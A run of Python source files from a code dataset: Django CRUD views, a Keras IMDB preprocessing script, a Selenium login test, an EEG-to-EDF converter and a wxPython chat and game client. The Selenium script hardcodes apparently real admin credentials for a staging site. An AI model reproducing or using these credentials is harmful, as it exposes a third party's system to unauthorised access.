request.POST['address']\n\t\t\tbuilder.number = request.POST['number']\n\t\t\tbuilder.complement = request.POST['complement'] \n\t\t\tbuilder.save()\n\n\t\t\tmessages.success(request, 'Record saved successfully!')\n\t\t\treturn redirect('/builder/')\n\t\telse:\n\t\t\tmessages.warning(request, 'Erro occurred! Try again!')\n\t\t\treturn redirect('/builder/')\n\telse:\n\t\tform = FormBuilder()\n\n\treturn render(request, 'builder/add.html', {\n\t\t'form':form\n\t})\n\ndef edit(request, builder_id):\n\n\tbuilder = Builder.objects.get(pk=builder_id)\n\n\tif request.method == 'POST':\n\n\t\tform = FormBuilder(request.POST)\n\n\t\tif form.is_valid():\n\n\t\t\tbuilder.name = request.POST['name']\n\t\t\tbuilder.phone = request.POST['phone']\n\t\t\tbuilder.address = request.POST['address']\n\t\t\tbuilder.number = request.POST['number']\n\t\t\tbuilder.complement = request.POST['complement'] \n\t\t\tbuilder.save()\n\t\t\t\n\t\t\tmessages.success(request, 'Record updated successfully!')\n\t\t\treturn redirect('/builder/')\n\t\telse:\n\t\t\tmessages.warning(request, 'Erro occurred! Try again!')\n\t\t\treturn redirect('/builder/')\n\telse:\n\n\t\tdata = {'name':builder.name,\n\t\t\t\t'phone':builder.phone,\n\t\t\t\t'address':builder.address,\n\t\t\t\t'number':builder.number,\n\t\t\t\t'complement':builder.complement}\n\n\t\tform = FormBuilder(initial=data)\n\n\treturn render(request, 'builder/edit.html',{\n\t\t'form':form,\n\t\t'builder_id':builder.id\n\t})\n\ndef delete(request, builder_id):\n\n\tbuilder = Builder.objects.get(pk=builder_id)\n\tbuilder.delete()\n\tmessages.success(request, 'Record deleted successfully!')\n\t\n\treturn redirect('/builder/')","sub_path":"instruments/catalog/views/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"359388904","text":"# 載入IMDB資料集\nfrom keras.datasets import imdb\nimport numpy as np\n\n(train_data, train_labels), (test_data,\n test_labels) = imdb.load_data(num_words=10000)\n# print(train_data[0])\n# print(train_labels[0])\n# print(max([max(sequence) for sequence in train_data]))\n\nword_index = imdb.get_word_index()\nreverse_word_index = dict([(value, key)\n for (key, value) in word_index.items()])\ndecoded_review = ' '.join(reverse_word_index.get(i-3, '?')\n for i in train_data[0])\n# print(decoded_review)\n\n# 將二層的整數List編碼成二元矩陣\ndef vectorize_sequence(sequences, dimension=10000):\n results = np.zeros((len(sequences), dimension))\n for i, sequences in enumerate(sequences):\n results[i, sequences] = 1.\n return results\n\nx_train = vectorize_sequence(train_data)\nx_test = vectorize_sequence(test_data)\n\n# print(x_train[0])\n\ny_train = np.asarray(train_labels).astype('float32')\ny_test = np.asarray(train_labels).astype('float32')","sub_path":"A03_Machine_learning/B01_Keras/03_start/03-04.py","file_name":"03-04.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"185180969","text":"from selenium import webdriver\ndriver = webdriver.Chrome(executable_path=r'C:\\Program Files\\Chromedriver\\chromedriver.exe')\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\n\ndriver.get('http://admin.staging.yinhe.t1t.in/auth/login')\ndriver.maximize_window()\n\nuser = driver.find_element_by_id('login')\nuser.send_keys('t1_qaadmin')\npas = driver.find_element_by_id('password')\npas.send_keys('47fCRYx9')\npas.send_keys(Keys.RETURN)\n\ntime.sleep(2)\n\na = driver.find_element_by_class_name('nav.navbar-nav.navbar-right')\na.find_element_by_id('user-link').click()\ntime.sleep(2)\ndriver.find_element_by_id('logout').click()\ntime.sleep(2)\n\npopup = driver.switch_to.alert\npopup.accept()\ntime.sleep(5)\ndriver.quit()\n\n","sub_path":"Yinhe(Staging)/Yinhe/Test_SBE.py","file_name":"Test_SBE.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"320255058","text":"from pathlib import Path\nimport pandas as pd\nimport mne\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pyedflib import highlevel\nimport pyedflib\n\n\nEEG_channels = [\"FP1\",\"FP2\",\"AF3\",\"AF4\",\"F7\",\"F3\",\"FZ\",\"F4\",\n \"F8\",\"FC5\",\"FC1\",\"FC2\",\"FC6\",\"T7\",\"C3\",\"CZ\",\n \"C4\",\"T8\",\"CP5\",\"CP1\",\"CP2\",\"CP6\",\"P7\",\"P3\",\n \"PZ\",\"P4\",\"P8\",\"PO7\",\"PO3\",\"PO4\",\"PO8\",\"OZ\"]\n\n# General settings and file paths\nmne.set_log_level(\"WARNING\")\n\nif __name__ == \"__main__\":\n ##EXP2\n srcPath = \"C:\\\\Users\\\\asus\\\\OneDrive - purdue.edu\\\\RealtimeProject\\\\Experiment2-Data\\\\Dataset\\\\U10\\\\S02\\\\Sensor-Data\\\\Process-Eeg\\\\txt\"\n dstPath = \"C:\\\\Users\\\\asus\\\\OneDrive - purdue.edu\\\\RealtimeProject\\\\Experiment2-Data\\\\Dataset\\\\U10\\\\S02\\\\Sensor-Data\\\\Process-Eeg\\\\edf\"\n\n #EXP1\n # srcPath = \"C:\\\\Users\\\\asus\\\\OneDrive - purdue.edu\\\\RealtimeProject\\\\Experiment1-Pilot\\\\UI07\\\\raw_txt\"\n # dstPath = \"C:\\\\Users\\\\asus\\\\OneDrive - purdue.edu\\\\RealtimeProject\\\\Experiment1-Pilot\\\\UI07\\\\raw_edf\"\n\n # srcPath = \"./data5/src\"\n # dstPath = \"./data5/dst\"\n\n summaryFile = open(\"./summary.txt\",'w')\n\n src = Path(srcPath)\n dst = Path(dstPath)\n\n for file in src.rglob(\"*.txt\"):\n print(\"Processsing \",file.name)\n\n p2 = dst / file.parent.name\n user = file.parent.name\n destinationFile = dst / file.with_suffix(\".edf\").name\n\n # if not p2.exists():\n # p2.mkdir(parents=True)\n\n sfreq = 250\n df = pd.read_csv(file)\n data = df[EEG_channels].values.transpose()\n\n # Create writer\n writer = pyedflib.EdfWriter(str(destinationFile), len(EEG_channels), file_type=1)\n\n # Create header\n writer.setPatientName(user)\n\n #Set label\n # label = df['label'].values.mean()\n # label = \"low workload\" if label < 7.5 else \"high workload\"\n # writer.setPatientAdditional(label)\n\n # Signals\n signal_headers = highlevel.make_signal_headers(EEG_channels, sample_rate=250)\n writer.setSignalHeaders(signal_headers)\n writer.writeSamples(data)\n\n #close\n writer.close()\n\n","sub_path":"ConvertDatasetToEdf.py","file_name":"ConvertDatasetToEdf.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"154939148","text":"import DataLoader as DL\nimport os.path as path\n\nseason = 2020\n\npath_league_data = path.join(path.dirname(path.dirname(path.abspath(__file__))), 'Cache', 'league_standings_full.csv')\npath_league_data_full = path.join(path.dirname(path.dirname(path.abspath(__file__))), 'Cache', 'league_data_full.csv')\n\nDataLoaderObj = DL.DataLoader()\nDataLoaderObj.scrape_league_standings(path_league_data_full,\n path_league_data,\n league_id=1217918,\n league_type='classic')\n","sub_path":"Code Old/scrape_league_data.py","file_name":"scrape_league_data.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"243340416","text":"import wx\nfrom wx.lib.pubsub import pub\nimport ticTacToe\nimport rockPaperScissors\nfrom client import *\nfrom time import sleep\nimport wx.grid as grid\nimport wx.lib.mixins.gridlabelrenderer as glr\n\n\n# signUp\nclass SignUp(wx.Frame):\n def __init__(self): # create sign up frame\n wx.Frame.__init__(self, None, title=\"Sign Up\", size=(430, 320),\n pos=(185, 130))\n self.SetBackgroundColour((153, 255, 153))\n\n col = wx.BoxSizer(wx.VERTICAL)\n col.AddSpacer(40)\n row = wx.BoxSizer(wx.HORIZONTAL)\n row.AddSpacer(100)\n\n lbl1 = wx.StaticText(self, label=\"Create an account\")\n lbl1.SetFont(wx.Font(22, wx.ROMAN, wx.NORMAL, wx.BOLD))\n row.Add(lbl1)\n col.Add(row)\n\n col.AddSpacer(20)\n row6 = wx.BoxSizer(wx.HORIZONTAL)\n row6.AddSpacer(80)\n self.name = wx.TextCtrl(self, size=wx.Size(110, 22))\n self.name.Bind(wx.EVT_SET_FOCUS, self.remove_lbl3)\n row6.Add(self.name)\n row6.AddSpacer(45)\n lbl4 = wx.StaticText(self, label=\":Nickname\")\n lbl4.SetFont(wx.Font(16, wx.ROMAN, wx.NORMAL, wx.BOLD))\n row6.Add(lbl4)\n col.Add(row6)\n\n row7 = wx.BoxSizer(wx.HORIZONTAL)\n row7.AddSpacer(75)\n self.nicknameError = wx.StaticText(self)\n self.nicknameError.SetFont(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.LIGHT))\n self.nicknameError.SetForegroundColour((255, 0, 0)) # set text color\n row7.Add(self.nicknameError)\n col.Add(row7)\n\n col.AddSpacer(5)\n row1 = wx.BoxSizer(wx.HORIZONTAL)\n row1.AddSpacer(80)\n self.user = wx.TextCtrl(self, size=wx.Size(110, 22))\n self.user.Bind(wx.EVT_SET_FOCUS, self.remove_lbl2)\n row1.Add(self.user)\n row1.AddSpacer(45) # space between StaticText and TextCtrl\n lbl2 = wx.StaticText(self, label=\":Username\")\n lbl2.SetFont(wx.Font(16, wx.ROMAN, wx.NORMAL, wx.BOLD))\n row1.Add(lbl2)\n col.Add(row1)\n\n row5 = wx.BoxSizer(wx.HORIZONTAL)\n row5.AddSpacer(70)\n self.usernameError = wx.StaticText(self)\n self.usernameError.SetFont(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.LIGHT))\n self.usernameError.SetForegroundColour((255, 0, 0)) # set text color\n row5.Add(self.usernameError)\n col.Add(row5)\n\n col.AddSpacer(5)\n row2 = wx.BoxSizer(wx.HORIZONTAL)\n row2.AddSpacer(80) # space between StaticText and TextCtrl\n self.password = wx.TextCtrl(self, size=wx.Size(110, 22),\n style=wx.TE_PASSWORD)\n row2.Add(self.password)\n row2.AddSpacer(45) # space between StaticText and TextCtrl\n lbl4 = wx.StaticText(self, label=\":Password\")\n self.password.Bind(wx.EVT_SET_FOCUS, self.remove_lbl1)\n lbl4.SetFont(wx.Font(16, wx.ROMAN, wx.NORMAL, wx.BOLD))\n row2.Add(lbl4)\n col.Add(row2)\n\n row3 = wx.BoxSizer(wx.HORIZONTAL)\n row3.AddSpacer(70)\n self.passwordError = wx.StaticText(self)\n self.passwordError.SetFont(wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.LIGHT))\n self.passwordError.SetForegroundColour((255, 0, 0))\n row3.Add(self.passwordError)\n col.Add(row3)\n\n col.AddSpacer(10)\n row4 = wx.BoxSizer(wx.HORIZONTAL)\n row4.AddSpacer(80)\n btn1 = wx.Button(self, label=\"sign up\")\n btn1.Bind(wx.EVT_BUTTON, self.check)\n row4.Add(btn1)\n row4.AddSpacer(70)\n cancel = wx.Button(self, label=\"cancel\")\n cancel.Bind(wx.EVT_BUTTON, self.cancel)\n row4.Add(cancel)\n col.Add(row4)\n\n self.SetSizer(col)\n self.Show()\n\n pub.subscribe(self.listener, \"update3\") # create a pubsub receiver\n self.valid = \"\"\n\n def remove_lbl1(self, event): # delete password error text\n self.passwordError.SetLabelText(\"\")\n self.password.SetBackgroundColour(\"white\")\n self.password.Clear()\n\n def remove_lbl2(self, event): # delete username error text\n self.usernameError.SetLabelText(\"\")\n self.user.SetBackgroundColour(\"white\")\n self.user.Clear()\n\n def remove_lbl3(self, event): # delete nickname error text\n self.nicknameError.SetLabelText(\"\")\n self.name.SetBackgroundColour(\"white\")\n self.name.Clear()\n\n def listener(self, msg): # Listener function - Receives update messages\n t = msg\n tmp = t[len(\"server response\") + 1:]\n info = tmp.split(\",\")\n if info[1] == \"checkSignUp\": # sign up status\n self.valid = [info[2], info[3], info[4]]\n\n def check(self, event): # Check if user can sign up\n p = self.password.GetValue()\n u = self.user.GetValue()\n n = self.name.GetValue()\n msg = \"3,checkSignUp,\" + u + \",\" + n\n conn_q.put(msg)\n sleep(0.5)\n while self.valid == \"\":\n sleep(0.2)\n print(\"sleep\")\n cond1 = len(p) < 4\n cond2 = len(u) < 4\n cond3 = len(n) > 8 or len(n) < 1\n if self.valid[0] == \"True\" and cond1 is False and cond2 is False \\\n and cond3 is False: # sign up succeeded\n msg = \"3,insertUser,\" + u + \",\" + p + \",\" + n\n conn_q.put(msg)\n self.Destroy()\n else:\n if cond1:\n self.password.SetBackgroundColour(\"pink\")\n self.password.Refresh()\n self.passwordError.SetLabelText(\"Use at least \"\n \"4 characters\")\n if cond2 or self.valid[1] == \"0\":\n self.user.SetBackgroundColour(\"pink\")\n self.user.Refresh()\n if cond2:\n self.usernameError.SetLabelText(\"Use at least \"\n \"4 characters\")\n else:\n self.usernameError.SetLabelText(\"Username is \"\n \"already taken\")\n if cond3 or self.valid[2] == \"0\":\n self.name.SetBackgroundColour(\"pink\")\n self.name.Refresh()\n if cond3:\n self.nicknameError.SetLabelText(\"Use 1-8 characters\")\n else:\n self.nicknameError.SetLabelText(\"Nickname is \"\n \"already taken\")\n\n def cancel(self, event): # close sign up frame\n self.Close()\n\n\n# chat\nclass Chat(wx.Frame):\n\n def __init__(self, name): # create chat frame\n self.name = name\n wx.Frame.__init__(self, None, title=\"Chat\", size=(500, 450),\n pos=(150, 100))\n self.SetBackgroundColour('white')\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.on_erase_background)\n\n col = wx.BoxSizer(wx.VERTICAL)\n col.AddSpacer(30)\n\n row = wx.BoxSizer(wx.HORIZONTAL)\n row.AddSpacer(100)\n self.messageBox = wx.TextCtrl(self, size=wx.Size(300, 260),\n style=wx.TE_MULTILINE | wx.HSCROLL)\n self.messageBox.SetEditable(False)\n row.Add(self.messageBox)\n col.Add(row)\n col.AddSpacer(30)\n\n row1 = wx.BoxSizer(wx.HORIZONTAL)\n row1.AddSpacer(70)\n send_btn = wx.Button(self, label='Send', size=wx.Size(80, 25))\n send_btn.Bind(wx.EVT_BUTTON, self.send_msg)\n row1.Add(send_btn)\n row1.AddSpacer(50)\n self.sendBox = wx.TextCtrl(self, size=wx.Size(200, 50))\n row1.Add(self.sendBox)\n col.Add(row1)\n\n self.SetSizer(col)\n self.Show()\n\n pub.subscribe(self.listener, \"update4\") # create a pubsub receiver\n\n def listener(self, msg): # Listener function - Receives update messages\n t = msg\n tmp = t[len(\"server response\") + 1:]\n info = tmp.split(\",\")\n if info[1] == \"msg\": # user got chat message\n self.messageBox.AppendText(info[2] + \":\" + info[3] + '\\n')\n\n def send_msg(self, event): # send user's message\n msg1 = self.sendBox.GetValue()\n if msg1 != \"\":\n self.sendBox.Clear()\n msg = \"4,msg,\" + self.name + \",\" + msg1\n conn_q.put(msg)\n self.messageBox.AppendText(\"You: \" + msg1 + '\\n')\n\n def on_erase_background(self, evt): # add a picture to the background\n dc = evt.GetDC()\n if not dc:\n dc = wx.ClientDC(self)\n rect = self.GetUpdateRegion().GetBox()\n dc.SetClippingRect(rect)\n dc.Clear()\n image = wx.Image(\"chat.bmp\", wx.BITMAP_TYPE_ANY)\n bmp = wx.Bitmap(image)\n dc.DrawBitmap(bmp, 0, 0)\n\n\n# login\nclass Login(wx.Frame):\n def __init__(self): # create login frame\n wx.Frame.__init__(self, None, title=\"Login\", size=(430, 320),\n pos=(185, 130))\n self.SetBackgroundColour((181, 253, 246))\n\n col = wx.BoxSizer(wx.VERTICAL)\n col.AddSpacer(50)\n row = wx.BoxSizer(wx.HORIZONTAL)\n row.AddSpacer(235)\n\n lbl1 = wx.StaticText(self, label=\"login\")\n lbl1.SetFont(wx.Font(30, wx.FONTFAMILY_MODERN, wx.NORMAL, wx.BOLD))\n row.Add(lbl1)\n col.Add(row)\n\n col.AddSpacer(30)\n row1 = wx.BoxSizer(wx.HORIZONTAL)\n row1.AddSpacer(80)\n self.user = wx.TextCtrl(self, size=wx.Size(110, 25))\n self.user.Bind(wx.EVT_SET_FOCUS, self.remove_lbl2)\n row1.Add(self.user)\n row1.AddSpacer(40) # space between StaticText and TextCtrl\n lbl2 = wx.StaticText(self, label=\":Username\")\n lbl2.SetFont(wx.Font(16, wx.FONTFAMILY_MODERN, wx.NORMAL, wx.BOLD))\n row1.Add(lbl2)\n col.Add(row1)\n\n col.AddSpacer(10)\n row2 = wx.BoxSizer(wx.HORIZONTAL)\n row2.AddSpacer(80) # space between StaticText and TextCtrl\n self.password = wx.TextCtrl(self, size=wx.Size(110, 25),\n style=wx.TE_PASSWORD)\n row2.Add(self.password)\n row2.AddSpacer(42) # space between StaticText and TextCtrl\n lbl3 = wx.StaticText(self, label=\":Password\")\n self.password.Bind(wx.EVT_SET_FOCUS, self.remove_lbl1)\n lbl3.SetFont(wx.Font(16, wx.FONTFAMILY_MODERN, wx.NORMAL, wx.BOLD))\n row2.Add(lbl3)\n col.Add(row2)\n\n row3 = wx.BoxSizer(wx.HORIZONTAL)\n row3.AddSpacer(122)\n self.error = wx.StaticText(self)\n self.error.SetForegroundColour((255, 0, 0))\n row3.Add(self.error)\n col.AddSpacer(10)\n col.Add(row3)\n\n row4 = wx.BoxSizer(wx.HORIZONTAL)\n row4.AddSpacer(80)\n btn1 = wx.Button(self, label=\"Login\")\n btn1.Bind(wx.EVT_BUTTON, self.login)\n row4.Add(btn1)\n\n row4.AddSpacer(25) # space between StaticText and TextCtrl\n btn2 = wx.Button(self, label=\"Sign up\")\n btn2.Bind(wx.EVT_BUTTON, self.sign_up)\n row4.Add(btn2)\n col.AddSpacer(20)\n col.Add(row4)\n\n self.SetSizer(col)\n self.Show()\n\n pub.subscribe(self.listener, \"update2\") # create a pubsub receiver\n\n def listener(self, msg): # Listener function - Receives update messages\n t = msg\n tmp = t[len(\"server response\") + 1:]\n info = tmp.split(\",\")\n if info[1] == \"checkLogin\": # login status\n if info[2] == \"True\":\n if info[4] == \"1\":\n self.error.SetLabelText(\".The user is already logged in\")\n else: # login succeeded\n msg = \"1,clientName\" + \",\" + info[3]\n conn_q.put(msg)\n self.Close()\n else:\n self.error.SetLabelText(\".Incorrect username or password\")\n\n def login(self, event): # send username and password\n u = self.user.GetValue()\n p = self.password.GetValue()\n msg = \"2,checkLogin,\" + u + \",\" + p\n conn_q.put(msg)\n\n def sign_up(self, event): # open sign up frame\n SignUp()\n self.user.Clear()\n self.password.Clear()\n self.error.SetLabelText(\"\")\n\n def remove_lbl1(self, event): # delete password error text\n self.error.SetLabelText(\"\")\n self.password.Clear()\n\n def remove_lbl2(self, event): # delete username error text\n self.error.SetLabelText(\"\")\n self.user.Clear()\n\n\n# MainFrame\nclass MainFrame(wx.Frame):\n name = \"\"\n def __init__(self): # create main Frame (main menu)\n wx.Frame.__init__(self, None, title=\"CHAT PARTY\", size=(500, 450),\n pos=(150, 100))\n self.SetBackgroundColour('white')\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.on_erase_background)\n self.Bind(wx.EVT_CLOSE, self.close_frame)\n\n col = wx.BoxSizer(wx.VERTICAL)\n col.AddSpacer(55)\n row = wx.BoxSizer(wx.HORIZONTAL)\n row.AddSpacer(50) # space between StaticText and TextCtrl\n\n lbl1 = wx.StaticText(self, label=\"Chat party\")\n lbl1.SetFont(wx.Font(38, wx.FONTFAMILY_ROMAN, wx.NORMAL, wx.BOLD))\n row.Add(lbl1)\n col.Add(row)\n\n col.AddSpacer(20)\n row1 = wx.BoxSizer(wx.HORIZONTAL)\n row1.AddSpacer(200)\n self.connect = wx.Button(self, label=\"connect\")\n self.connect.SetBackgroundColour((112, 193, 249))\n self.connect.Bind(wx.EVT_BUTTON, self.connect_to_server)\n row1.Add(self.connect)\n col.Add(row1)\n\n col.AddSpacer(20)\n row2 = wx.BoxSizer(wx.HORIZONTAL)\n row2.AddSpacer(170)\n self.login = wx.Button(self, label=\"login\", size=wx.Size(150, 70))\n self.login.SetBitmap(wx.Bitmap(\"login.bmp\", wx.BITMAP_TYPE_ANY))\n self.login.SetBackgroundColour((255, 255, 255))\n self.login.Bind(wx.EVT_BUTTON, self.login1)\n self.login.Disable()\n row2.Add(self.login)\n col.Add(row2)\n\n col.AddSpacer(20)\n row3 = wx.BoxSizer(wx.HORIZONTAL)\n row3.AddSpacer(170)\n self.signUp = wx.Button(self, label=\"Sign up\", size=wx.Size(150, 70))\n self.signUp.SetBitmapLabel(wx.Bitmap(\"sign up.bmp\",\n wx.BITMAP_TYPE_ANY))\n self.signUp.SetBackgroundColour((255, 255, 255))\n self.signUp.Bind(wx.EVT_BUTTON, self.sign_up1)\n self.signUp.Disable()\n row3.Add(self.signUp)\n col.Add(row3)\n\n self.SetSizer(col)\n self.Show()\n\n def close_frame(self, event): # close frame\n print(\" close frame\")\n msg = \"close\"\n conn_q.put(msg)\n self.Destroy()\n\n def on_erase_background(self, evt): # add a picture to the background\n dc = evt.GetDC()\n if not dc:\n dc = wx.ClientDC(self)\n rect = self.GetUpdateRegion().GetBox()\n dc.SetClippingRect(rect)\n dc.Clear()\n image = wx.Image(\"main.bmp\", wx.BITMAP_TYPE_ANY)\n bmp = wx.Bitmap(image)\n dc.DrawBitmap(bmp, 0, 0)\n\n def connect_to_server(self, event): # trying connect to the server\n comm_thread = Thread(target=client_send, args=()) # create tread\n comm_thread.start()\n pub.subscribe(self.listener, \"update1\") # create a pubsub receiver\n\n def listener(self, msg): # Listener function - Receives update messages\n t = msg\n tmp = t[len(\"server response\") + 1:]\n info = tmp.split(\",\")\n if info[0] == \"error\": # connection with server failed\n r = wx.MessageBox(info[1], \"Connection error\")\n if r == wx.OK:\n self.Destroy()\n\n else:\n info = tmp.split(\",\")\n if info[1] == \"connect\": # connection with server succeeded\n self.connect.Hide()\n self.signUp.Enable()\n self.login.Enable()\n\n if info[1] == \"clientName\": # get user's nickname\n MainFrame.name = info[2]\n self.login.Bind(wx.EVT_BUTTON, self.chat)\n self.login.SetLabel(\"chat\")\n self.login.SetBackgroundColour('white')\n self.login.SetBitmapLabel(wx.Bitmap(\"gameIcon.bmp\",\n wx.BITMAP_TYPE_ANY))\n self.signUp.Bind(wx.EVT_BUTTON, self.game)\n self.signUp.SetBackgroundColour('white')\n self.signUp.SetBitmapLabel(wx.Bitmap(\"chatIcon.bmp\",\n wx.BITMAP_TYPE_ANY))\n self.signUp.SetLabel(\"games\")\n\n def login1(self, event): # open login frame\n Login()\n\n def sign_up1(self, event): # open sign up frame\n SignUp()\n\n def chat(self, event): # open chat frame\n Chat(MainFrame.name)\n\n def game(self, event): # open games menu frame\n Games(MainFrame.name)\n\n\n# games menu\nclass Games(wx.Frame):\n def __init__(self, name): # create games menu frame\n self.name = name # player's name\n self.rivalName = \"\" # rival's name\n wx.Frame.__init__(self, None, -1, 'games menu', size=(500, 450),\n pos=(150, 100))\n self.SetBackgroundColour('white')\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.on_erase_background)\n\n col = wx.BoxSizer(wx.VERTICAL)\n col.AddSpacer(35)\n row = wx.BoxSizer(wx.HORIZONTAL)\n row.AddSpacer(70)\n\n lbl = wx.StaticText(self, label=\"choose a game to play\")\n lbl.SetFont(wx.Font(30, wx.FONTFAMILY_ROMAN, wx.FONTSTYLE_ITALIC, wx.BOLD))\n row.Add(lbl)\n col.Add(row)\n\n col.AddSpacer(50)\n row1 = wx.BoxSizer(wx.HORIZONTAL)\n row1.AddSpacer(60)\n self.xo = wx.Button(self, label=\"tic tac toe\")\n self.xo.SetFont(wx.Font(16, wx.FONTFAMILY_TELETYPE, wx.NORMAL, wx.BOLD))\n self.xo.Bind(wx.EVT_BUTTON, self.tic_tac_toe)\n row1.Add(self.xo)\n\n row1.AddSpacer(20)\n self.enter1 = wx.Button(self, label=\"enter game\", size=wx.Size(70, 35))\n self.enter1.Bind(wx.EVT_BUTTON, self.open_xo)\n row1.Add(self.enter1)\n self.enter1.Disable()\n col.Add(row1)\n\n col.AddSpacer(40)\n row2 = wx.BoxSizer(wx.HORIZONTAL)\n row2.AddSpacer(60)\n self.rps = wx.Button(self, label=\"rock paper scissors\")\n self.rps.SetFont(wx.Font(16, wx.FONTFAMILY_TELETYPE, wx.NORMAL, wx.BOLD))\n self.rps.Bind(wx.EVT_BUTTON, self.rock_paper_scissors)\n row2.Add(self.rps)\n\n row2.AddSpacer(20)\n self.enter2 = wx.Button(self, label=\"enter game\", size=wx.Size(70, 35))\n self.enter2.Bind(wx.EVT_BUTTON, self.open_rps)\n row2.Add(self.enter2)\n self.enter2.Disable()\n col.Add(row2)\n\n col.AddSpacer(40)\n row3 = wx.BoxSizer(wx.HORIZONTAL)\n row3.AddSpacer(60)\n best = wx.Button(self, label=\"best scores\")\n best.SetFont(wx.Font(16, wx.FONTFAMILY_TELETYPE, wx.NORMAL, wx.BOLD))\n best.Bind(wx.EVT_BUTTON, self.best_players)\n row3.Add(best)\n col.Add(row3)\n\n self.SetSizer(col)\n self.Show()\n pub.subscribe(self.listener, \"update5\") # create a pubsub receiver\n\n def on_erase_background(self, evt): # add a picture to the background\n dc = evt.GetDC()\n if not dc:\n dc = wx.ClientDC(self)\n rect = self.GetUpdateRegion().GetBox()\n dc.SetClippingRect(rect)\n dc.Clear()\n image = wx.Image(\"game.bmp\", wx.BITMAP_TYPE_ANY)\n bmp = wx.Bitmap(image)\n dc.DrawBitmap(bmp, 0, 0)\n\n def listener(self, msg): # Listener function - Receives update messages\n t = msg\n tmp = t[len(\"server response\") + 1:]\n info = tmp.split(\",\")\n if info[1] == \"xo\":\n if info[2] == \"playing\":\n wx.MessageBox(\"you are already in a game\", \"no\")\n self.Destroy()\n else: # user can connect to tic tac toe game\n self.rivalName = info[2]\n self.enter1.Enable()\n self.rps.Disable()\n self.xo.Disable()\n\n if info[1] == \"rps\":\n if info[2] == \"playing\":\n wx.MessageBox(\"you are already in a game\", \"no\")\n self.Destroy()\n else: # user can connect to rock paper scissors game\n self.rivalName = info[2]\n self.enter2.Enable()\n self.rps.Disable()\n self.xo.Disable()\n\n def open_xo(self, event): # open tic tac toe frame\n ticTacToe.start(self.name, self.rivalName)\n self.Close()\n\n def open_rps(self, event): # open rock paper scissors frame\n rockPaperScissors.start(self.name, self.rivalName)\n self.Close()\n\n def tic_tac_toe(self, event): # trying open tic tac toe frame\n msg = \"5,xo,\" + self.name\n conn_q.put(msg)\n\n # trying open rock paper scissors frame\n def rock_paper_scissors(self, event):\n msg = \"5,rps,\" + self.name\n conn_q.put(msg)\n\n def best_players(self, event):\n BestPlayers()\n msg = \"6,bestPlayers\"\n conn_q.put(msg)\n\n# best players\nclass BestPlayers(wx.Frame):\n def __init__(self): # create games menu frame\n wx.Frame.__init__(self, None, -1, 'Best Scores', size=(500, 450),\n pos=(150, 100))\n self.SetBackgroundColour((224, 179, 255))\n\n col = wx.BoxSizer(wx.VERTICAL)\n col.AddSpacer(30)\n row1 = wx.BoxSizer(wx.HORIZONTAL)\n row1.AddSpacer(100)\n lbl1 = wx.StaticText(self, label=\"Tic Tac Toe - top 3 players\")\n lbl1.SetFont(wx.Font(18, wx.ROMAN, wx.NORMAL, wx.BOLD))\n row1.Add(lbl1)\n col.Add(row1)\n\n col.AddSpacer(5)\n row2 = wx.BoxSizer(wx.HORIZONTAL)\n row2.AddSpacer(80)\n self.xo_grid = grid.Grid(self)\n self.xo_grid.CreateGrid(3, 2)\n self.set_grid_size(self.xo_grid)\n row2.Add(self.xo_grid)\n col.Add(row2)\n\n col.AddSpacer(25)\n row3 = wx.BoxSizer(wx.HORIZONTAL)\n row3.AddSpacer(65)\n lbl2 = wx.StaticText(self, label=\"Rock Paper Scissors - top 3 players\")\n lbl2.SetFont(wx.Font(18, wx.ROMAN, wx.NORMAL, wx.BOLD))\n row3.Add(lbl2)\n col.Add(row3)\n\n col.AddSpacer(5)\n row4 = wx.BoxSizer(wx.HORIZONTAL)\n row4.AddSpacer(80)\n self.rps_grid = grid.Grid(self)\n self.rps_grid.CreateGrid(3, 2)\n self.set_grid_size(self.rps_grid)\n\n row4.Add(self.rps_grid)\n col.Add(row4)\n\n self.SetSizer(col)\n self.Show()\n\n pub.subscribe(self.listener, \"update6\") # create a pubsub receiver\n\n def set_grid_size(self, grid):\n grid.DisableDragRowSize()\n grid.DisableDragColSize()\n grid.SetColLabelValue(0, \"NAME\")\n grid.SetColLabelValue(1, \"SCORE\")\n for i in range(2):\n grid.SetRowSize(i, 30)\n grid.SetColSize(i, 120)\n grid.SetRowSize(2, 30)\n\n def set_scores(self, players_list, grid): # set best scores in the right table\n counter = 0\n num = len(players_list)/2\n for i in range(int(num)):\n for j in range(2):\n grid.SetReadOnly(i, j, True)\n grid.SetCellFont(i, j, wx.Font(16, wx.SWISS, wx.NORMAL, wx.BOLD))\n grid.SetCellBackgroundColour(i, j,(206, 126, 206))\n grid.SetCellValue(i, j, players_list[counter])\n counter = counter + 1\n\n def listener(self, msg): # Listener function - Receives update messages\n t = msg\n tmp = t[len(\"server response\") + 1:]\n info = tmp.split(\",\")\n\n if info[1] == \"bestPlayers\":\n xo_players = info[2]\n xo_players_list = xo_players.split(\".\")\n xo_players_list.pop()\n print(\"players: \" + str(xo_players_list))\n self.set_scores(xo_players_list, self.xo_grid)\n rps_players = info[3]\n rps_players_list = rps_players.split(\".\")\n xo_players_list.pop()\n print(\"players: \" + str(rps_players_list))\n self.set_scores(rps_players_list, self.rps_grid)\n\nif __name__ == \"__main__\":\n app = wx.App(False)\n frame = MainFrame()\n app.MainLoop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":24087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"494548291","text":"import random\n\n\ndef jogar():\n 